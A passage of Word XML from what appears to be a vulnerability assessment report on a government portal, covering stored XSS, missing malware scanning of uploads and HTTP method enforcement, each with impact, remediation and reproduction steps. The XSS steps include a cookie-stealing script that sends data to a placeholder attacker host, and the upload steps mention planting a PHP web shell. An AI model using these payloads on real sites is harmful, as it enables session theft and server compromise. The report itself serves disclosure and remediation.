        <w:t xml:space="preserve"> form. When other users access the affected web page, their browsers execute the embedded malicious script, leading to unauthorized actions, data theft, or website defacement. Unlike Reflected XSS, the payload is persistently stored on the server, making the attack more widespread and persistent, affecting any user who views the compromised content. This vulnerability allows attackers to inject client-side scripts into web pages that are then viewed by other users. Common injection points include forums, comment sections, user profiles, or any area where user-supplied input is stored and later rendered without proper sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9205EC" w14:textId="7D5EC714" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA05CC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A Stored Cross-Site Scripting vulnerability in the government portal poses significant risks, potentially leading to severe financial repercussions, regulatory penalties, and lasting damage to the agency's reputation. Malicious scripts persistently embedded within the portal could compromise sensitive citizen data, including personally identifiable information (PII), leading to massive data breaches. Such a breach would incur substantial costs for forensic investigations, victim notification, credit monitoring services, and potential legal settlements. From a regulatory standpoint, this directly violates NIST CSF guidelines, which mandate robust data protection and integrity. Non-compliance could result in substantial fines and sanctions. Furthermore, public trust in government services is paramount; a data compromise would erode this trust, leading to widespread public outcry, reputational harm, and decreased citizen engagement with digital government initiatives. The integrity of official information displayed on the portal could also be compromised, leading to misinformation or unauthorized alterations, impacting critical government operations and decision-making.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD65DB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9816A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a robust Content Security Policy (CSP) to restrict the sources from which scripts can be loaded. Conduct regular security awareness training for developers on secure coding practices, specifically regarding input validation and output encoding. Deploy a Web Application Firewall (WAF) to detect and block common XSS attack vectors. Adopt a secure-by-design architectural approach that inherently separates user-supplied content from executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E686EA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD29CD1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):All</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user-supplied input must be strictly validated on the server-side to ensure it conforms to expected data types and formats, rejecting any unexpected or malicious characters. Implement context-aware output encoding for all user-generated content before rendering it in the browser. This ensures that any potentially malicious characters are treated as data rather than executable code. Sanitize user-generated content using a whitelist-based approach, allowing only a predefined set of safe HTML tags and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>attributes, and removing all others. Regularly patch and update all web application frameworks, libraries, and components to their latest secure versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D6E7A7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3681B089" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Identify an input field or comment section on the gov portal where user-supplied data is stored and displayed to other users. 2. Craft a malicious JavaScript payload, for example: &lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)&lt;/script&gt; or &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">='http://attacker.com/?cookie='+document.cookie&lt;/script&gt;. 3. Submit the malicious payload through the identified input field. 4. Log in as another user (or access the page from a different browser/session) and navigate to the page where the submitted content is displayed. 5. Observe that the JavaScript payload is executed by the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>browser of the second</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, demonstrating the stored XSS vulnerability (e.g., an alert box pops up, or session cookies are sent to the attacker's server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E3A75" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5674E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/attacks/xss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88FC24" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683DE4FD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2986BE1D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31383035"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47F32F60"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539E3AA4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Lack of Malware Scanning for Uploaded Files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783C9A2A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="576D41ED"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2FFB0EA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58708F4"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86F22AC" w14:textId="78A353FE"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-012</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A921CDD"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26A3835" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="73E698A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6D64B2"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8BCE690" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A08:2021-Software and Data Integrity Failures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1E623B8"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4F4F1A1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="039D24E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07A8C63"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868B6D1"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43A2559"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5B7B4BA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="05B96DD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E9D89E2"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CBF8662"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A932AEE"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AE2B153" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5068AA6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5B846F2"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9868A54"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9759F3E"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06AE88F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A5D7C4B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F762B67" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application allows users to upload files without performing comprehensive malware or security vulnerability scans on the uploaded content. This deficiency enables attackers to upload malicious files, such as malware, web shells, or exploit scripts, which can then be stored on the server. If these files are subsequently accessed by other users, processed by the server, or distributed, they can lead to client-side compromise, server-side code execution, or the spread of malicious software throughout the organization's network or user base. The absence of proper content validation and scanning allows untrusted and potentially harmful data to be introduced into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036BE650" w14:textId="333CF6D3" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F4102" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This vulnerability poses significant risks to the organization, including potential for severe financial loss, regulatory penalties, and significant reputational damage. An attacker could upload malicious software, leading to a data breach involving sensitive government data, system compromise, or widespread malware distribution. This could result in direct financial costs for incident response, forensic investigations, and system remediation. Furthermore, failing to protect against such threats demonstrates a lack of adherence to critical security frameworks like NIST CSF, leading to potential regulatory non-compliance, substantial fines, and legal repercussions. The public trust in the government portal could be severely eroded, leading to long-term damage to the organization's reputation and operational integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101DE18A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65622F9E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a robust, multi-layered file upload security architecture. Integrate an enterprise-grade antivirus and anti-malware scanning solution (e.g., an ICAP-based scanner or a dedicated scanning service) into the file upload workflow. Consider implementing Content Disarm and Reconstruction (CDR) technology to transform uploaded files into safe formats, regardless of their original content. Ensure all file storage is isolated from the main web server and that a secure content delivery network (CDN) is used for distribution, if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>applicable.TACTICAL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate a commercial or open-source malware scanning engine into the file upload pipeline. All uploaded files must be scanned immediately upon upload and before they are stored or made accessible to any users or other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>systems.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reject any file that fails the malware scan or is identified as potentially malicious. Provide clear error messages without revealing excessive technical </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>details.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict file type validation using a whitelist approach. Only permit file extensions and MIME types that are explicitly required by the application (e.g., PDF, DOCX, JPG, PNG).- Store uploaded files in a separate, non-web-accessible storage location (e.g., dedicated object storage, network share) rather than directly within the web server's document root.- Rename uploaded files to prevent path traversal, directory listing, and arbitrary code execution vulnerabilities. Use a cryptographically secure random filename or a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UUID.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict file size limits to prevent denial-of-service attacks and resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C99AFE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BA68B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Access the file upload functionality of the government portal, which typically involves an authenticated user session. 2. Prepare a test file containing a known malware signature (e.g., the EICAR test string) or a simple benign script (e.g., a PHP web shell if the server supports PHP). 3. Upload the prepared malicious or suspicious file through the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application's file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload interface. 4. Observe that the file is successfully uploaded and stored without any indication of a security scan failure, rejection, or warning. 5. Attempt to access the uploaded file via its direct URL or by having another user download it to confirm its presence and potential distribution without interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040D2AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF1FD1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A08_2021-Software_and_Data_Integrity_Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D44B8C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/434.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566323A9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BE728" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFBE6D"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202E9713"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0AF92DB9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Improper HTTP Method Enforcement</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145BC8AF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366681E7"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706B6AA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5925822"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4BC255" w14:textId="48502EEF"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-010</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76AF046"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C908C84" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.6 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="51AFE8D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3E8A765"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F6AB637" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Design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BDD44BA"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A29161" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-779</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1970949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48364B4"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FBB31DF"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B7501BD"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2D0A5AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="54CD20F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F026924"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A88383B"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6E22B72"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DA95921" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="38438F15"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C76F66D"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AD8AB1B"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5292025"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5C31683" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12D4FD43" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004A4A5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
